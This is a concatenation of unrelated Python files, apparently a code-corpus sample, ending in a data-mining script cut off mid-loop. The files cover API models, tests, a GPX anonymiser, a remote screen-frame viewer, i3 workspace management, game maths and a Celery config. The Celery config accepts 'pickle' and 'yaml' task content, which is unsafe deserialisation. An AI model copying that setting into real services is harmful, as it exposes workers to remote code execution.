        "value": {"key": "value", "type": "[Product]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs.get("value")
        self.next_link = kwargs.get("next_link")
class ProductResultValueWithXMSClientName(msrest.serialization.Model):
    """One page of products where the item list is renamed client-side.

    :param indexes:
    :type indexes: list[~paging.models.Product]
    :param next_link:
    :type next_link: str
    """

    _attribute_map = {
        # Client attribute "indexes" maps to the wire key "values".
        "indexes": {"key": "values", "type": "[Product]"},
        "next_link": {"key": "nextLink", "type": "str"},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.indexes = kwargs.get("indexes")
        self.next_link = kwargs.get("next_link")
|
from PyQt5.QtWidgets import QWidget
from .RemoteSpyUI import Ui_RemoteSpy
class RemoteSpyForm(QWidget):
    """Window that displays remotely captured screen frames, kept at a 16:9
    aspect ratio, and notifies its owner when closed."""
    # Back-reference to the owning controller; set in __init__.
    # NOTE(review): this attribute shadows QWidget.parent() on instances of
    # this class — confirm nothing relies on calling the Qt method here.
    parent = None
    def __init__(self, parent=None):
        # Intentionally does not forward `parent` to QWidget: the widget is a
        # top-level window and `parent` is kept only as a callback target.
        super(RemoteSpyForm, self).__init__()
        self.parent = parent
        # Target frame aspect ratio, expressed as height / width (16:9).
        self.frame_proportion = 9 / 16
        self.ui = Ui_RemoteSpy()
        self.ui.setupUi(self)
        self.ui.screen_display.move(0, 0)
    def update_frame(self, frame):
        """Show the given frame (a QPixmap) on the screen-display label."""
        screen_display_object = self.ui.screen_display
        screen_display_object.setPixmap(frame)
    def paintEvent(self, event):
        """Re-fit the display label and the window itself to the 16:9 frame
        proportion on every repaint.

        NOTE(review): calling resize() from inside paintEvent can schedule
        further repaints; verify this does not cause a resize/paint loop.
        """
        container_size = self.size()
        container_height = container_size.height()
        container_width = container_size.width()
        container_proportion = container_height / container_width
        # Remember the current extents before clamping one dimension below.
        screen_height = container_height
        screen_width = container_width
        if container_proportion > self.frame_proportion:
            # Too tall for the frame: derive the height from the width.
            container_height = int(screen_width * self.frame_proportion)
        elif container_proportion < self.frame_proportion:
            # Too wide for the frame: derive the width from the height.
            container_width = int(screen_height / self.frame_proportion)
        self.ui.screen_display.resize(container_width, container_height)
        self.resize(container_width, container_height)
    def closeEvent(self, event):
        """Tell the owner to untoggle the remote-spy view when the window closes."""
        self.parent.toggle_remote_spy(False)
|
import numpy as np
from pymks.bases import GSHBasis
def test_gsh_no_symmetry():
    """A triclinic (no-symmetry) GSH basis value matches q_no_symm."""
    angles = np.array([[0.1, 0.2, 0.3],
                       [6.5, 2.3, 3.4]])
    basis = GSHBasis(n_states=[1])
    computed = np.squeeze(basis.discretize(angles))
    assert np.allclose(computed, q_no_symm(angles))
def test_gsh_hex():
    """A hexagonal-symmetry GSH basis value matches q_hex."""
    angles = np.array([[0.1, 0.2, 0.3],
                       [6.5, 2.3, 3.4]])
    basis = GSHBasis(n_states=[1], domain='hexagonal')
    computed = np.squeeze(basis.discretize(angles))
    assert np.allclose(computed, q_hex(angles))
def test_symmetry_check_hex():
    """Two hexagonally-equivalent orientations must yield equal coefficients."""
    orient_a = np.array([[30, 70, 45]]) * np.pi / 180.
    # Symmetrically equivalent orientation under hexagonal operations.
    orient_b = np.array([[30 + 180, 180 - 70, 2 * 60 - 45]]) * np.pi / 180.
    basis = GSHBasis(n_states=np.arange(0, 100, 5), domain='hexagonal')
    assert np.allclose(basis.discretize(orient_a), basis.discretize(orient_b))
def q_hex(x):
    """Reference value of one hexagonal GSH basis function.

    x is an (n, 3) array of Bunge Euler angles (phi1, Phi, phi2) in
    radians; phi2 does not appear in this particular basis function.
    """
    phi1 = x[:, 0]
    phi = x[:, 1]
    sin_phi = np.sin(phi)
    return -((5.0 / 4.0) * np.exp(-2j * phi1) *
             np.sqrt(6.0) * sin_phi ** 2)
def q_no_symm(x):
    """Reference value of one triclinic (no-symmetry) GSH basis function.

    x is an (n, 3) array of Bunge Euler angles (phi1, Phi, phi2) in radians.
    """
    phi1 = x[:, 0]
    phi = x[:, 1]
    phi2 = x[:, 2]
    return ((3.0 / 2.0) * (1.0 + np.cos(phi)) *
            np.exp(-1j * (phi1 + phi2)))
# Allow running this test module directly, without a test runner.
if __name__ == '__main__':
    test_gsh_no_symmetry()
    test_gsh_hex()
    test_symmetry_check_hex()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
usage : tJOG.py [-h] [-ADL] <inputfile>
-h : (optional) display help
-ADL : (optional) set the origin to the city centre of Adelaide (Australia, South Australia)
The output file tJOG_<inputfile> is created, with origin removed/replaced
e.g. tJOG.py -ADL test.gpx
https://github.com/micooke/tJOG
@license: MIT
@copyright: Copyright 2018, Mark Cooke
@author: Mark Cooke (https://github.com/micooke)
"""
import os
import sys
import re
def main():
    """Strip or replace the origin of a GPX track.

    Reads the input file named on the command line, subtracts the first
    lat/lon pair (the run origin) from every point — optionally adding the
    Adelaide city-centre offset with -ADL — and writes tJOG_<name>.gpx.

    Returns 0 on success, 1 on a usage or input error.
    """
    url = 'https://github.com/micooke/tJOG'
    usage = 'usage : tJOG.py [-h] [-ADL] <inputfile>'
    inputfile = ''
    latOffset = 0.0
    lonOffset = 0.0

    # input sanitisation
    if len(sys.argv) > 1:
        if sys.argv[1] in {'-h', '--help'}:
            print(usage)
            return 0
        elif sys.argv[1] in {'-ADL'}:
            # Origin is replaced with the Adelaide (SA) city centre.
            latOffset = -34.9286600
            lonOffset = 138.5986300
            # BUGFIX: the filename after -ADL was used unchecked; a missing
            # argument or nonexistent file now fails cleanly instead of
            # raising IndexError/IOError.
            if len(sys.argv) < 3 or not os.path.isfile(sys.argv[2]):
                print(usage)
                return 1
            inputfile = sys.argv[2]
        elif os.path.isfile(sys.argv[1]):
            inputfile = sys.argv[1]
        else:
            print('error: inputfile "'+sys.argv[1]+'" does not exist')
            return 1
    else:
        print(usage)
        return 1

    # generate the output filename
    outputfile = 'tJOG_'+os.path.splitext(inputfile)[0]+'.gpx'
    print('Input file :', inputfile)
    print('Output file :', outputfile)

    # open the input file and read the contents
    with open(inputfile, 'r') as f:
        content = f.read()

    # look for the first lat,lon and assume this is the 'origin'
    pattern = re.compile(r'lat="([^"]+)" lon="([^"]+)"')
    first = pattern.search(content)
    # BUGFIX: search() returns None when nothing matches; the old
    # `len(groups) != 2` check could never fire (a successful match always
    # has both groups) and the script crashed with an AttributeError.
    if first is None:
        print('error : No lat,lon information found in the gpx file')
        return 1

    # get the run origin
    lat0 = float(first.group(1))
    lon0 = float(first.group(2))

    # replace each lat,lon instance
    for m in pattern.finditer(content):
        # shift so the origin becomes lat,lon = 0,0 (plus any offset),
        # formatted to 7 decimal places
        lat_ = "{:.7f}".format(float(m.group(1)) - lat0 + latOffset)
        lon_ = "{:.7f}".format(float(m.group(2)) - lon0 + lonOffset)
        # NOTE(review): str.replace swaps *every* occurrence of the matched
        # coordinate text, not just this match — behavior preserved from
        # the original implementation.
        content = content.replace(m.group(1), lat_)
        content = content.replace(m.group(2), lon_)

    # replace the creator details, if present
    # BUGFIX: guard against a gpx file with no creator attribute.
    creator = re.search('creator="([^"]+)"', content)
    if creator is not None:
        content = content.replace(creator.group(1), url)

    # write the content to the output file
    with open(outputfile, 'w') as f:
        f.write(content)

    # normal program return
    return 0
# Exit with a nonzero status code only when main() reports an error.
if __name__=="__main__":
    result = main()
    if result > 0:
        sys.exit(result)
"""
File largely based on sample celery.py file from documentation
for working with Celery and Django here:
http://docs.celeryproject.org/en/latest/django/first-steps-with-django.html
"""
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# Set the default Django settings module for the 'celery' program
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tribe.settings')

app = Celery('tribe')

# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
# Discover tasks.py modules in every installed Django app.
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
# Store task results via django-celery's database backend and accept the
# listed serialization formats.
app.conf.update(
    CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend',
    CELERY_ACCEPT_CONTENT=['pickle', 'json', 'yaml']
)
@app.task(bind=True)
def debug_task(self):
    """Print the current task request; useful for verifying worker setup."""
    print('Request: {0!r}'.format(self.request))
|
__________________________________________________________________________________________________
sample 84 ms submission
class Solution:
    def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
        """Count the intervals not covered by any other interval.

        [l, r] is covered by [L, R] when L <= l and r <= R. Sorting by
        (start ascending, end descending) guarantees any interval able to
        cover the current one has already been seen, so one pass suffices.

        BUGFIX: the original used a plain ascending sort, which missed
        coverage between intervals sharing a start endpoint — e.g.
        [[1, 2], [1, 4]] returned 2 instead of 1.
        """
        if not intervals:
            return 0
        # Widest interval first among equal starts.
        intervals.sort(key=lambda iv: (iv[0], -iv[1]))
        remaining = len(intervals)
        left, right = intervals[0]
        for l, r in intervals[1:]:
            if left <= l and r <= right:
                # Covered by the current envelope interval.
                remaining -= 1
            else:
                # Starts a new envelope.
                left, right = l, r
        return remaining
__________________________________________________________________________________________________
sample 88 ms submission
class Solution:
    def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
        """Count intervals not covered by another, in one sorted sweep.

        After an ascending sort, intervals sharing a start appear narrowest
        first, so the running right edge just widens; an interval with a
        larger start survives only if it extends past the current edge.
        """
        intervals.sort()
        survivors = 1
        left, right = intervals[0]
        for start, end in intervals:
            if start == left:
                # Same start: the widest of the group wins; count unchanged.
                right = end
            elif end > right:
                # Extends past the current envelope: it survives.
                left, right = start, end
                survivors += 1
        return survivors
__________________________________________________________________________________________________
|
from pyglet.graphics import Batch
class Scene():
    """Base class for game scenes: owns a draw batch and lifecycle hooks."""

    def __init__(self, game=None, context=None):
        self.game = game
        # All drawables for this scene collect into one pyglet batch.
        self.batch = Batch()
        self.context = context or {}

    def load(self):
        """Hook: called when the scene becomes active."""
        pass

    def unload(self):
        """Hook: called when the scene is torn down."""
        pass

    def draw(self):
        """Render everything registered with this scene's batch."""
        self.batch.draw()

    def resize(self):
        """Hook: called when the window size changes."""
        pass

    def on_key_press(self, symbol, modifiers):
        """Hook: keyboard press events."""
        pass

    def on_key_release(self, symbol, modifiers):
        """Hook: keyboard release events."""
        pass
|
#!/usr/bin/env python3
import copy
from typing import List, Optional, Tuple
import i3ipc
from i3wsgroups import i3_proxy, icons, logger
from i3wsgroups import workspace_names as ws_names
# from i3wsgroups.ws_names import *
# Type alias re-exported from workspace_names for brevity.
GroupToWorkspaces = ws_names.GroupToWorkspaces
# Groups paired with their workspaces, in priority order (first = active).
OrderedWorkspaceGroups = List[Tuple[str, List[i3ipc.Con]]]
# Module-level logger shared with the rest of the package.
logger = logger.logger
class WorkspaceGroupsError(Exception):
    """Raised for user-facing workspace-group errors (bad input, conflicts)."""
# pylint: disable=too-few-public-methods
class ActiveGroupContext:
    """Resolves the group name to the currently active (first listed) group."""

    @staticmethod
    def get_group_name(_: i3ipc.Con,
                       group_to_workspaces: GroupToWorkspaces) -> str:
        """Return the first group, which is defined as the active one."""
        first_group = next(iter(group_to_workspaces))
        return first_group
# pylint: disable=too-few-public-methods
class FocusedGroupContext:
    """Resolves the group name to the group of the focused workspace."""

    @staticmethod
    def get_group_name(tree: i3ipc.Con, _: GroupToWorkspaces) -> str:
        """Return the group of the workspace that currently has focus."""
        focused = tree.find_focused().workspace()
        return ws_names.get_group(focused)
# pylint: disable=too-few-public-methods
class NamedGroupContext:
    """Resolves the group name to a fixed, explicitly provided name."""

    def __init__(self, group_name: str):
        # Name returned unconditionally by get_group_name.
        self.group_name = group_name

    def get_group_name(self, _: i3ipc.Con, __: GroupToWorkspaces) -> str:
        """Return the configured group name, ignoring both arguments."""
        return self.group_name
class WorkspaceGroupsController:
    """High-level i3 workspace-group operations: organizing, listing,
    switching and renaming workspaces across monitors and groups."""

    def __init__(self,
                 i3_proxy_: i3_proxy.I3Proxy,
                 add_window_icons: bool = False,
                 add_window_icons_all_groups: bool = False,
                 renumber_workspaces: bool = False):
        # Proxy wrapping the i3 IPC connection (tree queries, commands).
        self.i3_proxy = i3_proxy_
        # Embed window icons in names of the active group's workspaces.
        self.add_window_icons = add_window_icons
        # Embed window icons in names of every group's workspaces.
        self.add_window_icons_all_groups = add_window_icons_all_groups
        # Renumber local workspace numbers sequentially when organizing.
        self.renumber_workspaces = renumber_workspaces

    def get_tree(self, cached: bool = True) -> i3ipc.Con:
        """Return the i3 layout tree, optionally bypassing the proxy cache."""
        return self.i3_proxy.get_tree(cached)

    def organize_workspace_groups(self,
                                  workspace_groups: OrderedWorkspaceGroups,
                                  monitor_name: Optional[str] = None) -> None:
        """Rename the given groups' workspaces so group order, monitor index
        and local numbers are all encoded into their names.

        The first group in workspace_groups becomes the active one
        (group_index 0). Defaults to the focused monitor.
        """
        if monitor_name is None:
            monitor_name = self.i3_proxy.get_focused_monitor_name()
        monitor_index = self.i3_proxy.get_monitor_index(monitor_name)
        group_to_all_workspaces = ws_names.get_group_to_workspaces(
            self.get_tree().workspaces())
        for group_index, (group, workspaces) in enumerate(workspace_groups):
            logger.debug('Organizing workspace group: "%s" in monitor "%s"',
                         group, monitor_name)
            local_numbers = ws_names.compute_local_numbers(
                workspaces, group_to_all_workspaces.get(group, []),
                self.renumber_workspaces)
            for workspace, local_number in zip(workspaces, local_numbers):
                ws_metadata = ws_names.parse_name(workspace.name)
                ws_metadata.group = group
                ws_metadata.local_number = local_number
                ws_metadata.global_number = ws_names.compute_global_number(
                    monitor_index, group_index, local_number)
                dynamic_name = ''
                # Add window icons if needed: always in all-groups mode,
                # otherwise only for the active group (group_index 0).
                if self.add_window_icons_all_groups or (self.add_window_icons
                                                        and group_index == 0):
                    dynamic_name = icons.get_workspace_icons_representation(
                        workspace)
                ws_metadata.dynamic_name = dynamic_name
                new_name = ws_names.create_name(ws_metadata)
                self.i3_proxy.rename_workspace(workspace.name, new_name)
                # Keep the cached tree consistent with the rename.
                workspace.name = new_name

    def list_groups(self, monitor_only: bool = False) -> List[str]:
        """Return the group names of all (or only the focused monitor's)
        workspaces."""
        workspaces = self.get_tree().workspaces()
        if monitor_only:
            workspaces = self.i3_proxy.get_monitor_workspaces()
        group_to_workspaces = ws_names.get_group_to_workspaces(workspaces)
        return list(group_to_workspaces.keys())

    def list_workspaces(self,
                        group_context,
                        focused_only: bool = False,
                        monitor_only: bool = False) -> List[i3ipc.Con]:
        """Return workspaces, optionally restricted to a context group, the
        focused workspace, and/or the focused monitor."""
        workspaces = self.get_tree().workspaces()
        if monitor_only:
            workspaces = self.i3_proxy.get_monitor_workspaces()
        group_to_workspaces = ws_names.get_group_to_workspaces(workspaces)
        # If no context group specified, return workspaces from all groups.
        if not group_context:
            group_workspaces = sum(
                (list(workspaces)
                 for workspaces in group_to_workspaces.values()), [])
        else:
            group_name = group_context.get_group_name(self.get_tree(),
                                                      group_to_workspaces)
            group_workspaces = group_to_workspaces.get(group_name, [])
        if not focused_only:
            return group_workspaces
        focused_workspace = self.get_tree().find_focused().workspace()
        return [ws for ws in group_workspaces if ws.id == focused_workspace.id]

    def _create_new_active_group_workspace_name(self, monitor_name: str,
                                                target_group: str) -> str:
        """Build a name for a fresh workspace in target_group on the given
        monitor, using the lowest free local number (group_index 0 since the
        target group is becoming the active one)."""
        group_to_all_workspaces = ws_names.get_group_to_workspaces(
            self.get_tree().workspaces())
        used_local_numbers = ws_names.get_used_local_numbers(
            group_to_all_workspaces.get(target_group, []))
        local_number = next(
            iter(ws_names.get_lowest_free_local_numbers(1, used_local_numbers)))
        global_number = ws_names.compute_global_number(
            monitor_index=self.i3_proxy.get_monitor_index(monitor_name),
            group_index=0,
            local_number=local_number)
        ws_metadata = ws_names.WorkspaceGroupingMetadata(
            group=target_group,
            global_number=global_number,
            local_number=local_number)
        return ws_names.create_name(ws_metadata)

    def switch_monitor_active_group(self, monitor_name: str,
                                    target_group: str) -> None:
        """Reorder a monitor's groups so target_group becomes the active
        (first) one, then reorganize the workspace names accordingly."""
        monitor_workspaces = self.i3_proxy.get_monitor_workspaces(monitor_name)
        group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
            monitor_workspaces)
        # Target group first, then the remaining groups in their old order.
        reordered_group_to_workspaces = [
            (target_group, group_to_monitor_workspaces.get(target_group, []))
        ]
        for group, workspaces in group_to_monitor_workspaces.items():
            if group != target_group:
                reordered_group_to_workspaces.append((group, workspaces))
        self.organize_workspace_groups(reordered_group_to_workspaces,
                                       monitor_name)

    def switch_active_group(self, target_group: str,
                            focused_monitor_only: bool) -> None:
        """Make target_group the active group and focus a workspace in it.

        Always switches the focused monitor; other monitors switch too
        (unless focused_monitor_only) when they already have workspaces in
        the target group.
        """
        focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
        monitor_to_workspaces = self.i3_proxy.get_monitor_to_workspaces()
        for monitor, workspaces in monitor_to_workspaces.items():
            group_exists = (
                target_group in ws_names.get_group_to_workspaces(workspaces))
            if monitor == focused_monitor_name:
                logger.debug('Switching active group in focused monitor "%s"',
                             monitor)
            elif not focused_monitor_only and group_exists:
                logger.debug(
                    'Non focused monitor %s has workspaces in the group "%s", '
                    'switching to it.', monitor, target_group)
            else:
                continue
            self.switch_monitor_active_group(monitor, target_group)
        # NOTE: We only switch focus to the new workspace after renaming all the
        # workspaces in all monitors and groups. Otherwise, if the previously
        # focused workspace was renamed, i3's `workspace back_and_forth` will
        # switch focus to a non-existant workspace name.
        focused_group = ws_names.get_group(
            self.get_tree().find_focused().workspace())
        # The target group is already focused, no need to do anything.
        if focused_group == target_group:
            return
        group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
            monitor_to_workspaces[focused_monitor_name])
        if target_group in group_to_monitor_workspaces:
            # Focus the first existing workspace of the target group.
            workspace_name = group_to_monitor_workspaces[target_group][0].name
        else:
            # The focused monitor doesn't have any workspaces in the target
            # group, so create one.
            workspace_name = self._create_new_active_group_workspace_name(
                focused_monitor_name, target_group)
        self.i3_proxy.focus_workspace(workspace_name, auto_back_and_forth=False)

    def _create_workspace_name(self,
                               metadata: ws_names.WorkspaceGroupingMetadata
                               ) -> str:
        """Build a full workspace name from metadata, deriving the global
        number from the focused monitor and the metadata's group."""
        focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
        monitor_index = self.i3_proxy.get_monitor_index(focused_monitor_name)
        group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
            self.i3_proxy.get_monitor_workspaces(focused_monitor_name))
        group_index = ws_names.get_group_index(metadata.group,
                                               group_to_monitor_workspaces)
        # Work on a copy so the caller's metadata is left untouched.
        metadata = copy.deepcopy(metadata)
        metadata.global_number = ws_names.compute_global_number(
            monitor_index, group_index, (metadata.local_number))
        return ws_names.create_name(metadata)

    # If an existing workspace matches certain properties of the given metadata,
    # return its name and id. Otherwise, create and return a new workspace name
    # from the given metadata. In this case, if there is an existing conflicting
    # workspace, i.e. with the same (group, local_number), return its id as
    # well.
    # Note that only the group, local number, and static name are considered.
    def _derive_workspace(self, metadata: ws_names.WorkspaceGroupingMetadata
                          ) -> Tuple[str, Optional[int]]:
        # i3 commands like `workspace number n` will focus on an existing
        # workspace in another monitor if possible. To preserve this behavior,
        # we check the group workspaces in all monitors.
        group_to_all_workspaces = ws_names.get_group_to_workspaces(
            self.get_tree().workspaces())
        # Every workspace must have a unique (group, local_number) pair.
        for workspace in group_to_all_workspaces.get(metadata.group, []):
            if not ws_names.get_local_workspace_number(
                    workspace) == metadata.local_number:
                continue
            static_name = ws_names.parse_name(workspace.name).static_name
            if metadata.static_name is None or (
                    metadata.static_name == static_name):
                # Exact match: reuse the existing workspace.
                return (workspace.name, workspace.id)
            # Same (group, local_number) but different static name: report
            # the conflicting workspace's id alongside the new name.
            return (self._create_workspace_name(metadata), workspace.id)
        return (self._create_workspace_name(metadata), None)

    def _get_group_from_context(self, group_context):
        """Resolve the target group from a context object, defaulting to the
        active group of the focused monitor."""
        group_context = group_context or ActiveGroupContext()
        focused_monitor_name = self.i3_proxy.get_focused_monitor_name()
        group_to_monitor_workspaces = ws_names.get_group_to_workspaces(
            self.i3_proxy.get_monitor_workspaces(focused_monitor_name))
        target_group = group_context.get_group_name(
            self.get_tree(), group_to_monitor_workspaces)
        logger.info('Context group: "%s"', target_group)
        return target_group

    def focus_workspace_number(self, group_context,
                               target_local_number: int) -> None:
        """Focus the workspace with the given local number in the context
        group, creating a name for it if it does not exist yet."""
        target_workspace_name, _ = self._derive_workspace(
            ws_names.WorkspaceGroupingMetadata(
                group=self._get_group_from_context(group_context),
                local_number=target_local_number))
        logger.debug('Derived workspace name: "%s"', target_workspace_name)
        self.i3_proxy.focus_workspace(target_workspace_name)

    def move_to_workspace_number(self, group_context,
                                 target_local_number: int) -> None:
        """Move the focused container to the workspace with the given local
        number in the context group."""
        target_workspace_name, _ = self._derive_workspace(
            ws_names.WorkspaceGroupingMetadata(
                group=self._get_group_from_context(group_context),
                local_number=target_local_number))
        self.i3_proxy.send_i3_command(
            'move container to workspace "{}"'.format(target_workspace_name))

    def _relative_workspace_in_group(self,
                                     offset_from_current: int = 1) -> i3ipc.Con:
        """Return the workspace offset_from_current positions away from the
        focused one within its group, wrapping around at the ends."""
        focused_workspace = self.get_tree().find_focused().workspace()
        focused_group = ws_names.get_group(focused_workspace)
        group_workspaces_all_monitors = ws_names.get_group_to_workspaces(
            self.get_tree().workspaces())[focused_group]
        current_workspace_index = 0
        # Locate the focused workspace's position within its group.
        for (current_workspace_index,
             workspace) in enumerate(group_workspaces_all_monitors):
            if workspace.id == focused_workspace.id:
                break
        # Modulo wraps the offset around both ends of the group.
        next_workspace_index = (current_workspace_index + offset_from_current
                                ) % len(group_workspaces_all_monitors)
        return group_workspaces_all_monitors[next_workspace_index]

    def focus_workspace_relative(self, offset_from_current: int) -> None:
        """Focus the workspace offset_from_current positions away within the
        focused group."""
        next_workspace = self._relative_workspace_in_group(offset_from_current)
        self.i3_proxy.focus_workspace(next_workspace.name,
                                      auto_back_and_forth=False)

    def move_workspace_relative(self, offset_from_current: int) -> None:
        """Move the focused container to the workspace offset_from_current
        positions away within the focused group."""
        next_workspace = self._relative_workspace_in_group(offset_from_current)
        self.i3_proxy.send_i3_command('move container to workspace "{}"'.format(
            next_workspace.name))

    def update_focused_workspace(
            self, metadata_updates: ws_names.WorkspaceGroupingMetadata) -> None:
        """Apply group/local-number/static-name updates to the focused
        workspace and rename it accordingly.

        Raises WorkspaceGroupsError on an invalid group name or when the
        resulting (group, local_number) collides with another workspace.
        """
        focused_workspace = self.get_tree().find_focused().workspace()
        metadata = ws_names.parse_name(focused_workspace.name)
        if metadata_updates.group is not None and (
                not ws_names.is_valid_group_name(metadata_updates.group)):
            raise WorkspaceGroupsError(
                'Invalid group name provided: "{}"'.format(
                    metadata_updates.group))
        # Copy only the explicitly provided (non-None) fields.
        for section in ['group', 'local_number', 'static_name']:
            value = getattr(metadata_updates, section)
            if value is not None:
                setattr(metadata, section, value)
        global_name, workspace_id = self._derive_workspace(metadata)
        # A returned id belonging to another workspace means a collision.
        if workspace_id is not None and workspace_id != focused_workspace.id:
            raise WorkspaceGroupsError(
                'Workspace with local number "{}" already exists in group: '
                '"{}": "{}"'.format(metadata.local_number, metadata.group,
                                    global_name))
        self.i3_proxy.rename_workspace(focused_workspace.name, global_name)
|
import math
from decimal import Decimal
from .probability import roll_chance, roll_success_range
from .action import max_actions
def max_shots(group):
    """Maximum number of shots a weapon can achieve in one turn.

    Takes reloading into account via max_actions, assuming a 100-TU turn
    and a 15-TU reload cost.
    """
    turn_time_units = 100
    reload_cost = 15
    return max_actions(turn_time_units, group["time_units"], reload_cost,
                       group["burst"])
def burst(group):
    """Number of shots the fire mode makes: 3 on auto, otherwise 1."""
    return 3 if group["fire_mode"] == "auto" else 1
def chance_to_damage(damage, armor):
    """Chance that a hit damages a target with the given armor.

    Rolled damage is uniform over [0.5 * damage, 1.5 * damage].
    """
    low = Decimal(0.5 * damage)
    high = Decimal(1.5 * damage)
    return roll_chance(low, high, Decimal(armor))
def penetrating_damage(base_damage, armor):
    """Expected damage dealt after armor is applied.

    Rolls are uniform over [0.5, 1.5] * base_damage; returns the midpoint
    of the normalized successful-roll range, or 0 when nothing penetrates.
    """
    values = roll_success_range(0.5 * base_damage, 1.5 * base_damage, armor,
                                normalize=True)
    if not values:
        return 0
    return (values["min"] + values["max"]) / 2
def hits_to_kill(damage, health):
    """Number of hits needed to kill a target with the given health.

    Returns math.inf when damage is not positive; otherwise at least 1.
    """
    if damage <= 0:
        # No damage can ever be dealt.
        return math.inf
    hits = health / damage
    if hits < 1:
        return 1
    return math.ceil(hits)
|
import explorerhat as eh
from time import sleep
# Poll the Explorer HAT analog inputs once per second, forever (Ctrl-C stops).
while True:
    # Analog one: temperature sensor voltage. Conversion assumes a
    # TMP36-style part (0.5 V offset, 10 mV per degree C) — confirm.
    v1 = eh.analog.one.read()
    celsius = 100.0 * (v1 - 0.5)
    fahrenheit = 32 + 9 * celsius / 5.0
    print('Temperature is %4.1f degrees C or %4.1f degrees F'
          % (celsius, fahrenheit))
    # Analog two: light sensor; here a higher voltage means less light.
    v2 = eh.analog.two.read()
    light_level = 'low' if v2 > 3.5 else 'high'
    print('Light level is %s' % light_level)
    sleep(1)
|
#!/usr/local/bin/python3
# Attribute names each tag type may receive (filtered by filtra_attrs).
bloco_attrs = ('bloco_id', 'bloco_style')
ul_attrs = ('ul_id', 'ul_style')
def filtra_attrs(attrs, permitidos):
    """Render the allowed attrs as HTML, dropping each key's prefix.

    E.g. {'bloco_id': 'x'} with 'bloco_id' allowed becomes 'id="x"'.
    """
    rendered = []
    for key, value in attrs.items():
        if key in permitidos:
            html_name = key.split("_")[-1]
            rendered.append(f'{html_name}="{value}"')
    return ' '.join(rendered)
def tag_bloco(conteudo, *args, classe='success', inline=False, **novos_attrs):
    """Wrap content in a div (or span when inline) with filtered attributes.

    conteudo may be a callable; it is then invoked with *args and the new
    attributes to produce the content.
    """
    tag = 'span' if inline else 'div'
    if callable(conteudo):
        conteudo = conteudo(*args, **novos_attrs)
    attrs = filtra_attrs(novos_attrs, bloco_attrs)
    return f'<{tag} class={classe} {attrs}>{conteudo}</{tag}>'
def tag_lista(*itens, **novos_attrs):
    """Render the items as an HTML unordered list with filtered attributes."""
    itens_html = [f'<li>{item}</li>' for item in itens]
    attrs = filtra_attrs(novos_attrs, ul_attrs)
    return f'<ul {attrs}>{"".join(itens_html)}</ul>'
# Ad-hoc demonstration of the tag helpers when run as a script.
if __name__ == '__main__':
    print(tag_bloco('teste1', bloco_style='teste'))
    print(tag_bloco('teste2', inline=True))
    print(tag_bloco('teste3', classe='danger'))
    print(tag_lista('teste1', 'teste2'))
    # A callable content: the list builder runs inside the block wrapper,
    # each helper filtering only the attrs it recognizes.
    print(
        tag_bloco(
            tag_lista,
            'teste1',
            'teste2',
            classe='danger',
            bloco_style='style_bloco',
            ul_style='style_ul'))
|
def pony_func(func):
    """Decorator marking a method as exposed to a PonyDebugger caller."""
    func.is_pony_func = True
    return func
class BasePonyDomain(object):
    """Base class for PonyDebugger protocol domains."""

    # Functions exposed without an instance; subclasses may override.
    STATIC_FUNCS = {}

    def __init__(self, client):
        # The debugger client this domain serves.
        self.client = client
        # Domains start disabled until the client enables them.
        self.enabled = False

    @pony_func
    def enable(self, params):
        """Mark the domain as enabled (exposed to the debugger client)."""
        self.enabled = True

    @pony_func
    def disable(self, params):
        """Mark the domain as disabled (exposed to the debugger client)."""
        self.enabled = False
|
#OSBS mining
from src import predict
from src import data
from src import neon_paths
from glob import glob
import pandas as pd
import geopandas as gpd
from src.start_cluster import start
from distributed import wait
import os
import re
import traceback
def find_rgb_files(site, year, config):
    """List RGB sensor tiles matching the given site and acquisition year."""
    candidates = glob(config["rgb_sensor_pool"], recursive=True)
    return [path for path in candidates
            if site in path and "/{}/".format(year) in path]
def convert(rgb_path, hyperspectral_pool, year, savedir):
    """Convert the matching .h5 hyperspectral tile to a GeoTIFF if needed.

    Returns the path of the (existing or newly created) hyperspectral tif
    corresponding to rgb_path's geographic index and the given year.
    """
    basename = os.path.basename(rgb_path)
    # Tiles are matched on the easting_northing index embedded in the name.
    # FIX: raw string avoids the invalid-escape DeprecationWarning for \d.
    geo_index = re.search(r"(\d+_\d+)_image", basename).group(1)
    candidates = [x for x in hyperspectral_pool if geo_index in x]
    hyperspectral_h5_path = [x for x in candidates if year in x][0]
    tif_basename = os.path.splitext(basename)[0] + "_hyperspectral.tif"
    tif_path = "{}/{}".format(savedir, tif_basename)
    # Skip the (slow) h5 conversion when the tif already exists on disk.
    if not os.path.exists(tif_path):
        tif_path = neon_paths.convert_h5(hyperspectral_h5_path, rgb_path, savedir)
    return tif_path
# Load the pipeline configuration and enumerate OSBS RGB tiles for 2019.
config = data.read_config("config.yml")
tiles = find_rgb_files(site="OSBS", config=config, year="2019")

#generate HSI_tif data if needed.
hyperspectral_pool = glob(config["HSI_sensor_pool"], recursive=True)
rgb_pool = glob(config["rgb_sensor_pool"], recursive=True)

# Convert .h5 hyperspectral tiles to GeoTIFF on a CPU dask cluster.
cpu_client = start(cpus=10)
tif_futures = cpu_client.map(convert, tiles, hyperspectral_pool=hyperspectral_pool, savedir = config["HSI_tif_dir"], year="2019")
wait(tif_futures)

# Pretrained checkpoints: species classifier and dead-tree filter.
species_model_path = "/blue/ewhite/b.weinstein/DeepTreeAttention/snapshots/5d25a170b129462bbbd5815547e77d41.pl"
dead_model_path = "/orange/idtrees-collab/DeepTreeAttention/Dead/snapshots/9192d967fa324eecb8cf2107e4673a00.pl"

# Collect successfully converted tif paths; failed conversions are
# silently skipped (best-effort by design).
hsi_tifs = []
for x in tif_futures:
    try:
